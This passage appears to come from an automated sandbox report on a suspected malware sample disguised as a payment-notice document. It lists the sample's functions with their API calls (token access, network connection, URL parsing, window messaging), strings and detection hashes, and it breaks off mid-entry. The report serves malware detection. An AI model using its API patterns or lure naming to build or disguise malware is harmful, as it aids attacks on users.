SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00942DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00942DD6
GetCurrentThreadId.KERNEL32 ref: 00942DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00942DE4

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 482d82fc2d1a954014926f34eba1a0bad468708706c221aabfde6a98da35f7b7
Instruction ID: 20428ff2a092635a595a1d1f9038cf9512ae4f15cdba86cb46be5428b6586653
Opcode Fuzzy Hash: 482d82fc2d1a954014926f34eba1a0bad468708706c221aabfde6a98da35f7b7
Instruction Fuzzy Hash: B8E092B2529224BBD7201B729C4DFEB7E6CFF82BB1F800019F109E10809AA4C880D6B0

Function 00978863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 008F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008F9693
Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96A2
Part of subcall function 008F9639: BeginPath.GDI32(?), ref: 008F96B9
Part of subcall function 008F9639: SelectObject.GDI32(?,00000000), ref: 008F96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00978887
LineTo.GDI32(?,?,?), ref: 00978894
EndPath.GDI32(?), ref: 009788A4
StrokePath.GDI32(?), ref: 009788B2

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: b602c19602a10607185733aa5eda29d07ef79c2583ba919e58263344f6aebd99
Instruction ID: 2ce8e17e0c0a71e6095e0c9e4381a31837c61dbc45ebbdf8fcf10d8dd9f7f365
Opcode Fuzzy Hash: b602c19602a10607185733aa5eda29d07ef79c2583ba919e58263344f6aebd99
Instruction Fuzzy Hash: B5F09A36059258BADB122F94AC0DFCA3E19AF06310F408104FA25610E1C7740550EBE6

Function 008F98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 008F98CC
SetTextColor.GDI32(?,?), ref: 008F98D6
SetBkMode.GDI32(?,00000001), ref: 008F98E9
GetStockObject.GDI32(00000005), ref: 008F98F1

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 384775dff2d15ae40770c216436728a2649d256ce8ad7197c52e85ebb16e6cac
Instruction ID: 9440b6df6b07719b5f335c4e821fb14f0e4041b7d202c4b4ce2c5d44ea3d5b66
Opcode Fuzzy Hash: 384775dff2d15ae40770c216436728a2649d256ce8ad7197c52e85ebb16e6cac
Instruction Fuzzy Hash: 72E0657225C244ABDB215B74AC09BE87F51EB11335F14822DF6F9540E1C3714680AF10

Function 0094162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00941634
OpenThreadToken.ADVAPI32(00000000,?,?,?,009411D9), ref: 0094163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009411D9), ref: 00941648
OpenProcessToken.ADVAPI32(00000000,?,?,?,009411D9), ref: 0094164F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: a6062547add07b5abd5a1687ebe3db0f7a4f1341b1c78a228133821d707b7347
Instruction ID: 9299f3da4c34e6fc6559056ae48c21ac7cc47af842791698b2bcad03bf39ea8d
Opcode Fuzzy Hash: a6062547add07b5abd5a1687ebe3db0f7a4f1341b1c78a228133821d707b7347
Instruction Fuzzy Hash: 89E08CB3616211EBDB201FA0AE0DF863B7CAF44792F15880CF249E9090E73484C0DBA4

Function 0093D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0093D858
GetDC.USER32(00000000), ref: 0093D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0093D882
ReleaseDC.USER32(?), ref: 0093D8A3

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 8fd2a1393723c9ec78c76351fbb6b65d32d253f87a08863c8b6b672ff16e36ae
Instruction ID: fda12e957e80e70b8df8c0c2227759c317c82227ce61870a2c81ddbc783396f9
Opcode Fuzzy Hash: 8fd2a1393723c9ec78c76351fbb6b65d32d253f87a08863c8b6b672ff16e36ae
Instruction Fuzzy Hash: 97E01AB2814209DFCF41AFA0D84C66DBBB2FB08310F108409E90AE7250CB389981AF40

Function 0093D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0093D86C
GetDC.USER32(00000000), ref: 0093D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0093D882
ReleaseDC.USER32(?), ref: 0093D8A3

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: dab6eba6c0469dc8a4890626019911b84f01462f15f17f22a9113acc2d19873b
Instruction ID: c559f1f0c97df5663053f7695e89fdcce655bc580865f92b5ae9134a4d4c649f
Opcode Fuzzy Hash: dab6eba6c0469dc8a4890626019911b84f01462f15f17f22a9113acc2d19873b
Instruction Fuzzy Hash: B1E01AB2C14209DFCF41AFA0D84C66DBBB1FB08310B108008E90AE7250CB385941AF40

Function 00954D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 008E7620: _wcslen.LIBCMT ref: 008E7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00954ED4

Strings

LPT, xrefs: 00954DFB
*, xrefs: 00954E10

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: ec6c1f52a63502fa73881566d2aeda0e1e19a46e66c1db0d94287f17dc8f9932
Instruction ID: ed6704f8af020ce086634de209385a4d1b35505453d452200a4de5c9d3d47bbe
Opcode Fuzzy Hash: ec6c1f52a63502fa73881566d2aeda0e1e19a46e66c1db0d94287f17dc8f9932
Instruction Fuzzy Hash: 9C916E75A002449FCB54DF59C484EAABBF5BF45308F188099E80A9F3A2C735ED89CB91

Function 0090E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0090E30D

Strings

pow, xrefs: 0090E2E5, 0090E302

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: b35a94105a0340e4549d8c65f20142554fb09c07a8cdc36d9a3fe1c3cef9461c
Instruction ID: 5b373c766d610ffebcac55fcbe91dc8bfef77637cc8f6f861c5530e6610ef16d
Opcode Fuzzy Hash: b35a94105a0340e4549d8c65f20142554fb09c07a8cdc36d9a3fe1c3cef9461c
Instruction Fuzzy Hash: BA512A71B1C10B9ACB157758D9013B9BBFCAB40740F744DA8E0D5823F9DB348CD1AA86

Function 008FE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 008FE1B1

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: e717ab409d63263ced14d3b7242e01489ef5112a3583adef55ffa00cec999152
Instruction ID: 973763f2554f8c97fb1648ce57f7293ec3b38c2acd34a81b7b2f7fb142acdbb7
Opcode Fuzzy Hash: e717ab409d63263ced14d3b7242e01489ef5112a3583adef55ffa00cec999152
Instruction Fuzzy Hash: 1C51237590424ADFDB25DF38C481ABA7BA8FF56310F244055F992DB2E0E7349D82CB91

Function 008FF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 008FF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 008FF2BB

Strings

@, xrefs: 008FF2AF

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: a0de8d4f6e6bf3c89c06570d08e2ce44dc4cf1151c1d99895cf8f235bd141949
Instruction ID: d781ab6478373b352c4a27999b6b8daa621aac5eae0161118d785a23e9c343e9
Opcode Fuzzy Hash: a0de8d4f6e6bf3c89c06570d08e2ce44dc4cf1151c1d99895cf8f235bd141949
Instruction Fuzzy Hash: 4851787181C7859BD320AF15E886BABBBF8FF85300F81484DF29981195EB718529CB67

Function 00965745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 009657E0
_wcslen.LIBCMT ref: 009657EC

Strings

CALLARGARRAY, xrefs: 009657E6, 009657EB

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: ce491a35944775644b8e143e4156f4c0ff241be49c077be7e084ea98e7d690f1
Instruction ID: 388e5d830ebafae5d8ae7d4ba4e53881611308d14f0081fc30e77f6392931b78
Opcode Fuzzy Hash: ce491a35944775644b8e143e4156f4c0ff241be49c077be7e084ea98e7d690f1
Instruction Fuzzy Hash: 7C41AF71E002099FCB14DFA9C8829FEBBF9FF59324F154069E505A7262E7349D81CB91

Function 0095D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0095D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0095D13A

Strings

|, xrefs: 0095D10B

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: af3bf968825a64c4d3b87f93a774602c91566bcb973c560e3d6934e3ac948d10
Instruction ID: ee19f6cb99d55c74ec4caadf77f065a3201d32480778af38a04809cff5118bae
Opcode Fuzzy Hash: af3bf968825a64c4d3b87f93a774602c91566bcb973c560e3d6934e3ac948d10
Instruction Fuzzy Hash: 5E317E71C01219EBCF15EFA6CC85AEE7FB9FF05340F100059F819A6161EB31AA56CB61

Function 0097356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00973621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0097365C

Strings

static, xrefs: 009735BC

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: b06e413dec8db997c67e921d2ee9372e078882b7acfa2987c4f39ca557840bc1
Instruction ID: a894cce392cbd657709fe28f5c957bd1646f454138315c3081a8660147533554
Opcode Fuzzy Hash: b06e413dec8db997c67e921d2ee9372e078882b7acfa2987c4f39ca557840bc1
Instruction Fuzzy Hash: 3F318E72210604AADB109F28DC81ABB73ADFF88724F10C619F9A997280DA31AD91D760

Function 00974537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0097461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00974634

Strings

', xrefs: 0097458E

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 0cac043db23c2c72e73aba8fc2a058c65a92df9d202f58b6efbbc4210f1c6c1b
Instruction ID: 0ab93869541a78e1bd1698ec3f806f1aaa150858cee816f650db9bd3fced8f90
Opcode Fuzzy Hash: 0cac043db23c2c72e73aba8fc2a058c65a92df9d202f58b6efbbc4210f1c6c1b
Instruction Fuzzy Hash: 15310775A0130A9FDB14CFA9C991BDA7BB9FF49300F14816AE909AB352D770A941CF90

Function 009731EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0097327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00973287

Strings

Combobox, xrefs: 00973249

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 8458c0fa2514b4be404d456400add8e0490a2c9da2b22649ba05aff9ebad446f
Instruction ID: 33655c99404f258b811704e8d1d04bd6a139038cb1dd7a15d4fb7163d94ccf8c
Opcode Fuzzy Hash: 8458c0fa2514b4be404d456400add8e0490a2c9da2b22649ba05aff9ebad446f
Instruction Fuzzy Hash: 6011B6723041087FEF119E54DC85EBB376EEB99364F10C528F52CA7291D6319D51A760

Function 00973710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 008E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008E604C
Part of subcall function 008E600E: GetStockObject.GDI32(00000011), ref: 008E6060
Part of subcall function 008E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 008E606A

GetWindowRect.USER32(00000000,?), ref: 0097377A
GetSysColor.USER32(00000012), ref: 00973794

Strings

static, xrefs: 00973757

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 3d322309cd6107134447a701decb1633b2b9a9ef00ff98cd27f686a53ab7fd2e
Instruction ID: 7ee0e9aae89f8c8b732e3312f9f44bc9e96d133dddc713b9d898c5bb5df0f2b5
Opcode Fuzzy Hash: 3d322309cd6107134447a701decb1633b2b9a9ef00ff98cd27f686a53ab7fd2e
Instruction Fuzzy Hash: 781129B2610209AFDB00DFA8CC46EEA7BB8FB09354F008918F959E2250E735E851AB50

Function 0095CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0095CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0095CDA6

Strings

<local>, xrefs: 0095CD66

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 6d496f61c9775429eca0efd3d2174d23de7414109d4685b9ff801924ba230c16
Instruction ID: f7aa57339800a4275453c02eeff1886c853b9b027bac7691cdfce34228af7d54
Opcode Fuzzy Hash: 6d496f61c9775429eca0efd3d2174d23de7414109d4685b9ff801924ba230c16
Instruction Fuzzy Hash: 4611A3F22157357ED7288A678C45FE7BEBCEB127A5F00462AB909D20C0D6649848D7F0

Function 00973429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 009734AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009734BA

Strings

edit, xrefs: 0097348F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 2d09b41bc72ba7ae4e4637f6667d33dffe323d88692fc4eee361908d8b7d716e
Instruction ID: 9d694a802690189f7c8c47e1de1d2ae4a717ea5cd0bb424519ac0727c6dbdbaf
Opcode Fuzzy Hash: 2d09b41bc72ba7ae4e4637f6667d33dffe323d88692fc4eee361908d8b7d716e
Instruction Fuzzy Hash: 5E11BF72110108ABEB154F64DC84AAB376EEB55378F50C724FA68931E0C731DC91A750

Function 00946C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00946CB6
_wcslen.LIBCMT ref: 00946CC2

Strings

STOP, xrefs: 00946CBC, 00946CC1

Memory Dump Source

